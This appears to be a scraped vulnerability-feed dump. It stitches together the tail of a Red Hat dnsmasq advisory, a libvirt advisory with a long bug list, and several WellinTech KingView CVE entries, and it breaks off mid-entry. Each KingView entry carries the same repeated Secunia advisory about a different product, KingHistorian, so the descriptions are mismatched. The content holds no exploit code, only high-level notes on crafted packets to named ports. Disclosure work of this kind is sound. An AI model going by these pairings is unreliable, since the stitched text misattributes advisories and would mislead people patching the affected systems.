dnsmasq-debuginfo-2.48-13.el6.x86_64.rpm
dnsmasq-utils-2.48-13.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/dnsmasq-2.48-13.el6.src.rpm
i386:
dnsmasq-2.48-13.el6.i686.rpm
dnsmasq-debuginfo-2.48-13.el6.i686.rpm
ppc64:
dnsmasq-2.48-13.el6.ppc64.rpm
dnsmasq-debuginfo-2.48-13.el6.ppc64.rpm
s390x:
dnsmasq-2.48-13.el6.s390x.rpm
dnsmasq-debuginfo-2.48-13.el6.s390x.rpm
x86_64:
dnsmasq-2.48-13.el6.x86_64.rpm
dnsmasq-debuginfo-2.48-13.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/dnsmasq-2.48-13.el6.src.rpm
i386:
dnsmasq-debuginfo-2.48-13.el6.i686.rpm
dnsmasq-utils-2.48-13.el6.i686.rpm
ppc64:
dnsmasq-debuginfo-2.48-13.el6.ppc64.rpm
dnsmasq-utils-2.48-13.el6.ppc64.rpm
s390x:
dnsmasq-debuginfo-2.48-13.el6.s390x.rpm
dnsmasq-utils-2.48-13.el6.s390x.rpm
x86_64:
dnsmasq-debuginfo-2.48-13.el6.x86_64.rpm
dnsmasq-utils-2.48-13.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/dnsmasq-2.48-13.el6.src.rpm
i386:
dnsmasq-2.48-13.el6.i686.rpm
dnsmasq-debuginfo-2.48-13.el6.i686.rpm
x86_64:
dnsmasq-2.48-13.el6.x86_64.rpm
dnsmasq-debuginfo-2.48-13.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/dnsmasq-2.48-13.el6.src.rpm
i386:
dnsmasq-debuginfo-2.48-13.el6.i686.rpm
dnsmasq-utils-2.48-13.el6.i686.rpm
x86_64:
dnsmasq-debuginfo-2.48-13.el6.x86_64.rpm
dnsmasq-utils-2.48-13.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-3411.html
https://access.redhat.com/security/updates/classification/#moderate
https://rhn.redhat.com/errata/RHSA-2013-0276.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFRJbynXlSAg2UNWIIRAvO7AKC9DX720FbYDvxil9RlNiiZHmN2TQCglV5s
c8EDGXAb588QM/PyzO8J+9A=
=GXp0
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 6) - x86_64
3. Description:
The libvirt library is a C API for managing and interacting with the
virtualization capabilities of Linux and other operating systems. In
addition, libvirt provides tools for remote management of virtualized
systems. This update
includes the changes necessary to call dnsmasq with a new command line
option, which was introduced to dnsmasq via RHSA-2013:0277.
Space precludes documenting all of these changes in this advisory. After installing the
updated packages, libvirtd must be restarted ("service libvirtd restart")
for this update to take effect. Bugs fixed (http://bugzilla.redhat.com/):
695394 - default migration speed is too low for guests with heavy IO
713922 - virsh man page refers to unspecified "documentation"
724893 - RFE: better message when start the guest which CPU comprises flags that host doesn't support
770285 - cpu-compare fails inside virtualized hosts
770795 - blkioParameters doesn't work
770830 - --config doesn't work correctly for blkiotune option --device-weight
771424 - RFE: Resident Set Size (RSS) limits on qemu guests
772290 - RFE: Configurable VNC start port or ability to exclude use of specific ports
787906 - [python binding] migrateGetMaxSpeed did not work right with parameters
789327 - [RFE] Resume VM from s3 as a response for monitor/keyboard/mouse action
798467 - libvirt doesn't validate a manually specified MAC address for a KVM guest
799986 - libvirtd should explicitly check for existance of configured sanlock directory before trying to register lockspace
801772 - RFE: Use scsi-hd, scsi-cd instead of scsi-disk
803577 - virsh attach-disk should detect disk source file type when sourcetype is not specified
804601 - Controllers do not support virsh attach/detach-device --persistent
805071 - RFE : Dynamically change the host network/bridge that is attached to a vNIC
805243 - [RFE] add some mechanism to pre-populate credentials for libvirt connections
805361 - RFE: privnet should work well with lxc
807545 - the programming continue to run when executing virsh snapshot-list with --roots and --from mutually exclusive options
807907 - Tunnelled migration sometimes report error when do scalability test
807996 - libvirtd may hang during tunneled migration
810799 - virsh list and "--managed-save " flag can't list the domains with managed save state
813191 - virt-xml-validate fail for pool, nodedev and capabilities
813735 - Non detection of qemu TCG mode support within a RHEL VM
813819 - Unable to disable sending keep-alive messages
815644 - There is no executable permission on default pool.
816448 - inaccurate display for status of stopped libvirt-guests service
816503 - [RFE] Ability to configure sound pass-through to appear as MIC as opposed to line-in
816609 - [libvirt] python bindings have inconsistent handling of float->int conversion
817219 - Don't allow to define multiple pools with the same target
817239 - dominfo outputs incorrectly for memory unit
817244 - Issues about virsh -h usage
818467 - Improve libvirt debug capability
818996 - [rfe] allow to disable usb & vga altogether
819401 - [LXC] virsh dominfo can't get a correct VCPU number
820173 - Libvirtd fails to initialize sanlock driver
821665 - unclear error message: qemu should report 'lsi' is not supported
822068 - libvirtd will crash when hotplug attah-disk to guest
822340 - There are some typos when virsh connect source guest server with ssh PermitRootLogin disabled
822373 - libvirtd will crash when tight loop of hotplug/unplug PCI device to guest without managed=yes
823362 - vol-create-as should fail when allocate a malformed size image
823765 - libvirt should raise an error when set network with special/invalid MAC address
823850 - find-storage-pool-sources/ find-storage-pool-sources-as can't return XML describing of netfs/iscsi pool
823857 - guest can't start with unable to set security context error if guests are unconfined
824253 - manpage: document limitations on identifying domains with numeric names
825068 - Start a guest with assigned usb device which is used by another guest will reset the label
825108 - unexpected result from virt-pki-validate
825600 - spice client could not disconnect after update graphics with connected='disconnect'
825699 - Can't start pool with uuid and other commands with uuid issue
825820 - Libvirt is missing important hooks
827234 - potential to deadlock libvirt on EPIPE
827380 - Minimum value for nodesuspend time duration need be given in virsh manual or help
827519 - "Unable to determine device index for network device" when attaching new network device to a guest that already has a netdev of type='hostdev'
828023 - [libvirt] Setting numa parameters causes guest xml error
828640 - valgrind defects some use-after-free errors - virsh console
828676 - virt-xml-validate validate fails when xml contains kernel/initrd/cmdline elements
828729 - CPU topology parsing bug on special NUMA platform
829107 - valgrind defects some use-after-free errors - virsh change-media
829246 - virsh detach-disk will be failed with special image name
829562 - virsh attach-disk --cache does not work
830051 - [Doc] virsh doc has error/omission on device commands and nodedev commands
830057 - man doc of vol-create-as format is lack of qed and vmdk
831044 - #libvirtd error messages should be fixed
831049 - Update libvirtd manpage to describe how --timeout works & its usage limitations
831099 - add the ability to set a wwn for SCSI disks
831149 - virt-manager causes iowait, due to rewriting XML files repeatable
832004 - vncdisplay can't output default ip address for the vnc display
832081 - Fix keepalive issues in libvirt
832156 - RFE: Support customizable actions when sanlock leases are lost
832302 - libvirt shouldn't delete an existing unregistered volume in vol-create
832309 - [Doc]Problems about manual and help of virsh desc command
832329 - [Doc]Problems about help of virsh domiftune command
832372 - [Doc]Problems about manual and help of virsh dompmsuspend command
833327 - [Doc]The abbreviation of domain name-id-uuid arguments are inconsistent in manual
833674 - Deactivate memory balloon with type of none get wrong error info
834365 - Improve error message when trying to change VM's processor count to 0
834927 - virConnectDomainEventRegisterAny won't register the same callback for the same event but for different domains
835782 - when create the netfs pool, virsh pool-create-as do not remount the target dir which is mounted for another device firstly.
836135 - spice migration: prevent race with libvirt
837466 - virsh report error when quit virsh connection
837470 - libvirtd crash when virsh find-storage-pool-sources
837485 - can not start vdsmd service after update the libvirt packages
837542 - [regression]can't undefine guest after guest saved.
837544 - snapshot-list return core dumped
837761 - [Doc] Inaccurate description about force option in change-media help
837884 - per-machine-type CPU models for safe migration
839537 - Error occurs when given hard_limit in memtune more than current swap_hard_limit
839557 - [Doc]Need to explain in manual that the output memory of memtune command may be rounded
839661 - libvirt: support QMP event for S4
839930 - There is no message if debug level number is out of scope when run a virsh command with -d option
842208 - "Segmentation fault" when use virsh command with vdsm installed
842272 - include-passwd option can't worked when using domdisplay.
842557 - libvirt doesn't check ABI compatibility of watchdog and channel fully
842966 - [snapshot] snapshot-info report unknow procedure error even snapshot-info works well
842979 - [Regression] lxc domain fail to start due to not exist cgroup dir
843324 - snapshot-edit will report error message but return 0 when do not update xml
843372 - disk-only snapshot create external file even if snapshot command failed
843560 - Add live migration support for USB
843716 - The libvirtd deamon was killed abnormally when i destroy a domain which was in creating process
844266 - Fail to modify the domain xml with saved file
844408 - after failed hotplug qemu keeps the file descriptor open
845448 - [blockcopy]sometimes Ctrl+C can't terminate blockcopy when use --wait with other options
845460 - exit console will crash libvirtd
845468 - snapshot-list --descendants --from will core dumped
845521 - Plug memory leak after escaping sequence for console
845523 - Use after free when escaping sequence for console
845635 - Return a specific error when qemu-ga is missing or unusable during a live snapshot (quiesce)
845893 - Double close of FD when failing to connect to a remote hypervisor
845958 - libvirt domain event handler can not catch domain pmsuspend and get error when pmwakeup
845966 - libvirt pmsuspend to disk will crash libvirtd
845968 - numatune command can't handle nodeset with '^' for excluding a node
846265 - virsh blkdeviotune fail
846629 - Failed to run cpu-stats when cpuacct.usage_percpu is too large
846639 - Should forbid suspend&resume operate when guest in pmsuspend status.
848648 - [Doc] Add annotation about how to enable stack traces in log messages
851391 - Throw out "DBus support" error in libvirtd.log when restart libvirtd
851395 - xml parse error occur after upgrade to the newest package
851397 - can not start guest in rhevm
851423 - virsh segmentation fault when using find-storage-pool-sources
851452 - unexpected result of virsh save when stop libvirtd
851491 - Libvirtd crash when set "security_default_confined = 0" in qemu.conf
851959 - cpuset can be set in two places.
851963 - Guest will be undefined if remove channel content
851981 - The migration with macvtap network was denied by the target when i set "setenforce 1" in the target
852260 - AFFECT_CURRENT flag does not work well in set_scheduler_parameters when domain is shutoff
852383 - libvirtd dead when start a domain with openvswitch interface
852592 - libvirtd will be crashed when run vcpupin more than once
852668 - libvirt got security label parse error with xml
852675 - [Graphical framebuffer] update device with connected parameter "fail", guest's xml changed
852984 - virsh start command will be hung with openvswitch network interface
853002 - [qemu-ga]shutdown guest by qemu-guest-agent will successful but report error
853043 - guest can't start with unable to set security context error if guests are unconfined
853342 - [doc]There are some typos in CPU Tuning part of the formatdomain.html
853567 - Request for taking fix for PF shutdown in 802.1Qbh
853821 - virsh reboot with 'agent' shutdown mode will hang
853925 - [configuration][doc] set security_driver in qemu.conf
853930 - It is failed to start guest when the number of vcpu is different between <vcpu> and <cputune/>
854133 - libvirt should check the range of emulator_period and emulator_quota when set them with --config
854135 - The libvirt domain event handler can't catch the disconnecting information when disconnected the guest
855218 - Problems on CPU tuning
855237 - [libvirt] Add a new boot parameter to set the delay time before rebooting
855783 - improve error message for secret-get-value
856247 - full RHEL 6.4 block-copy support
856489 - Modify target type of channel element from 'virtio' to 'guestfwd' will cause libvirtd crash
856528 - List option --state-shutoff should filter guest properly
856864 - Do live migration from rhel6.1.z release version to rhel6.4 newest version and back will get "error Unknown controller type 'usb'"
856950 - Deadlock on libvirt when playing with hotplug and add/remove vm
856951 - The value of label is wrong with static dac model in xml
857013 - Failed to run cpu-stats after vcpu hotplug
857341 - fail to start lxc domain
857367 - destroy default virtual network throw error in libvirtd.log
858204 - The libvirt augeas lens can't parse a libvirtd.conf file where host_uuid is present
859320 - libvirt auth.conf make virsh cmd Segmentation fault (core dumped)
859331 - Create new guest fail with usermode
859712 - [libvirt] Deadlock in libvirt after storage is blocked
860519 - security: support for names on DAC labels
860907 - It reported an error when checked the schedinfo of the lxc guest
860971 - There should be a comma between "kvmclock" and "kvm_pv_eoi" in qemu-kvm cmd generated by libvirt
861564 - fail to start lxc os container
863059 - Unable to migrate guest: internal error missing hostuuid element in migration data
863115 - libvirt calls 'qemu-kvm -help' too often
864097 - Cannot start domains with custom CPU model
864122 - virtualport parameter profileid in a <network> or <portgroup> causes failure to initialize guest interface
864336 - [LXC] destroy domain will hang after restart libvirtd
864384 - virsh list get error msg when connect ESXi5.0 server
865670 - Warning messages "Found untested VI API major/minor version 5.1" show when connect to esx5.1 server
866288 - libvirtd crashes when both <boot dev='...'/> and <boot order='...'/> are used in one domain XML
866364 - libvirtd crash when edit a net with some operation
866369 - libvirt: terminating vm on signal 15 when hibernate fails on ENOSPACE
866388 - libvirt: no event is sent to vdsm in case vm is terminated on signal 15 after hibernate failure
866508 - Fail to import libvirt python module due to 'undefined symbol: libssh2_agent_free'
866524 - use-after-free on virsh node-memory-tune
866999 - CPU topology is missing in capabilities XML when libvirt fails to detect host CPU model
867246 - [LXC] A running guest will be stopped after restarting libvirtd service
867372 - Can not change affinity of domain process with "cpuset "of <vcpu> element.
867412 - libvirt fails to clear async job when p2p migration fails early
867724 - Libvirt sometimes fails to wait on spice to migrate
867764 - default machine type is detected incorrectly
868389 - virsh net-update to do a live add of a static host to a network that previously had no static hosts, reports success, but doesn't take effect until network is restarted.
868483 - multiple default portgroups erroneously allowed in network definitions
868692 - Libvirt: Double dash in VM causes it to disappear - bad parsing of XML
869096 - Vcpuinfo don't return numa's CPU Affinity properly on mutiple numa node's machine
869100 - poor error message for virsh snapshot-list --roots --current
869508 - the option --flags of virsh nodesuspend command should be removed
869557 - Can't add more than 256 logical networks
870099 - virsh emulatorpin still can work when vcpu placement is "auto".
870273 - coding errors in virsh man page
871055 - libvirt should support both upstream and RHEL drive-mirror
871201 - If libvirt is restarted after updating dnsmasq or radvd packages, a subsequent "virsh net-destroy" will fail to kill the dnsmasq/radvd processes
871312 - emulatorpin affinity isn't the same as Cpus_allowed_list of emulator ' thread when cpuset is specified
872104 - wrong description of net-update option(config, live and current)
872656 - virNodeGetMemoryParameters is broken on older kernels
873134 - setting current memory equal to max will end with domain start as current > max
873537 - virsh save will crash libvirtd sometimes
873538 - [Regression] Define domain failed in ESX5.1
873792 - libvirt: cancel migration is sent but migration continues
873934 - Failed to run Coverity on libvirt RHEL source rpm
874050 - virsh nodeinfo can't get the right info on AMD Bulldozer cpu
874171 - virsh should make external checkpoint creation easy
874330 - First autostarted guest has always id 1
874549 - libvirt_lxc segfaults when staring lxc through openstack
874702 - CVE-2012-3411 libvirt needs to use new dnsmasq option to avoid open DNS proxy
874860 - libvirt fails to start if storage pool contains image with missing backing file
876415 - virDomainGetVcpuPinInfo might fail to show right CPU affinity setting
876816 - libvirt should allow disk-only (external) snapshots of offline VMs
876817 - virsh should make it easier to filter snapshots by type
876828 - the qcow2 disk's major:minor number still exists in guest's devices.list after hot-unplug
876868 - virsh save guest with an no-exist xml should show error msg
877095 - libvirt doesn't clean up open files for device assignment
877303 - virsh snapshot-edit prints garbage with wrong parameters
878376 - Coverity scan founds some resource leaks and USE_AFTER_FREE
878400 - virsh pool-destroy should fail with error info when pool is in using
878779 - domdisplay with --include-password can't display VNC passwor
878862 - NULL pointer usage when starting guest with broken image chain
879130 - there is not error message when create external checkpoint with --memspec= (NULL)
879132 - create external checkpoint sometimes will crash libvirtd
879360 - Libvirt leaks libvirt_lxc processes on container shutdown
879473 - net-update may cause libvirtd crash when modify portgroup
879780 - vol-clone failed to clone LVM volumes
880064 - [LXC] libvirt_lxc segfaults when staring lxc guest
880919 - Libvirtd crashed while saving the guest to a nonexistent directory
881480 - virDomainUpdateDeviceFlags fails when interface type is 'network'
882915 - virsh doesn't report error if updated data argument for command "schedinfo" is invalid
883832 - Cannot start VMs after upgrade from 6.3 to libvirt-0.10.2-10
884650 - Add support for qemu-kvm's BALLOON_CHANGE event to avoid using monitor in virDomainGetXMLDesc
885081 - Invalid job handling while restarting CPUs when creating external snapshot
885727 - Libvirt won't parse dnsmasq capabilities when debug logs are enabled
885838 - improper errors logged when changing the bridge device used by a domain <interface type='bridge'>
886821 - libvirt-launched dnsmasq listens on localhost when it shouldn't
886933 - High disk usage when both libvirt and virt-manager are opened
887187 - [Doc] There are some typos in libvirt manual and formatdomain.html
888426 - block-copy pivot fails complaining that job is not active
889319 - support for IFLA_EXT_MASK and RTEXT_FILTER_VF needs to be added to lib
889407 - snapshot --redefine disk snapshot may cause libvirtd crash
891653 - Cgroups memory limit are causing the virt to be terminated unexpectedly
894085 - libvirt: vm pauses after live storage migration
896403 - delete snapshot which name contain '/' lead to libvirtd crash
6
| VAR-201207-0380 | CVE-2012-1831 | WellinTech KingView Heap Buffer Overflow Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in WellinTech KingView 6.53 allows remote attackers to execute arbitrary code via a crafted packet to TCP port 555. KingView is a product for building data information service platforms for industrial automation. WellinTech KingView is prone to multiple memory corruption vulnerabilities and a directory-traversal vulnerability. Failed exploit attempts will result in a denial-of-service condition.
WellinTech KingView 6.53 is vulnerable. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
KingHistorian Memory Corruption Vulnerability
SECUNIA ADVISORY ID:
SA49765
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49765/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49765
RELEASE DATE:
2012-07-09
DISCUSS ADVISORY:
http://secunia.com/advisories/49765/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49765/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49765
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in KingHistorian, which can be
exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to an invalid pointer write error,
which can be exploited to corrupt memory via a specially crafted
packet sent to port 5678.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in version 3.0.
SOLUTION:
Install patch.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
ICS-CERT credits Dillon Beresford.
ORIGINAL ADVISORY:
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-185-01.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0381 | CVE-2012-1832 | WellinTech KingView Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
WellinTech KingView 6.53 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via a crafted packet to (1) TCP or (2) UDP port 2001. KingView is a product for building data information service platforms for industrial automation. A security vulnerability exists in WellinTech KingView that allows an attacker to send a specially crafted message to the TCP 2001 or UPD 2001 port, which can trigger the reading of illegal memory domain data, causing the application to crash. WellinTech KingView is prone to multiple memory corruption vulnerabilities and a directory-traversal vulnerability.
An attacker can exploit these issues to access arbitrary files within the context of the affected application and execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
WellinTech KingView 6.53 is vulnerable. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
KingHistorian Memory Corruption Vulnerability
SECUNIA ADVISORY ID:
SA49765
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49765/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49765
RELEASE DATE:
2012-07-09
DISCUSS ADVISORY:
http://secunia.com/advisories/49765/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49765/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49765
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in KingHistorian, which can be
exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to an invalid pointer write error,
which can be exploited to corrupt memory via a specially crafted
packet sent to port 5678.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in version 3.0.
SOLUTION:
Install patch.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
ICS-CERT credits Dillon Beresford.
ORIGINAL ADVISORY:
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-185-01.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0059 | CVE-2012-2560 | WellinTech KingView Path traversal vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in WellinTech KingView 6.53 allows remote attackers to read arbitrary files via a crafted HTTP request to port 8001. KingView is a product for building data information service platforms for industrial automation. WellinTech KingView is prone to multiple memory corruption vulnerabilities and a directory-traversal vulnerability.
An attacker can exploit these issues to access arbitrary files within the context of the affected application and execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
WellinTech KingView 6.53 is vulnerable. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
KingHistorian Memory Corruption Vulnerability
SECUNIA ADVISORY ID:
SA49765
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49765/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49765
RELEASE DATE:
2012-07-09
DISCUSS ADVISORY:
http://secunia.com/advisories/49765/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49765/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49765
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in KingHistorian, which can be
exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to an invalid pointer write error,
which can be exploited to corrupt memory via a specially crafted
packet sent to port 5678.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in version 3.0.
SOLUTION:
Install patch.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
ICS-CERT credits Dillon Beresford.
ORIGINAL ADVISORY:
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-185-01.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0379 | CVE-2012-1830 | WellinTech KingView Stack Buffer Overflow Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in WellinTech KingView 6.53 allows remote attackers to execute arbitrary code via a crafted packet to TCP port 555. KingView is a product for building data information service platforms for industrial automation. WellinTech KingView is prone to multiple memory corruption vulnerabilities and a directory-traversal vulnerability. Failed exploit attempts will result in a denial-of-service condition.
WellinTech KingView 6.53 is vulnerable. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
KingHistorian Memory Corruption Vulnerability
SECUNIA ADVISORY ID:
SA49765
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49765/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49765
RELEASE DATE:
2012-07-09
DISCUSS ADVISORY:
http://secunia.com/advisories/49765/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49765/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49765
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in KingHistorian, which can be
exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to an invalid pointer write error,
which can be exploited to corrupt memory via a specially crafted
packet sent to port 5678.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in version 3.0.
SOLUTION:
Install patch.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
ICS-CERT credits Dillon Beresford.
ORIGINAL ADVISORY:
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-185-01.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
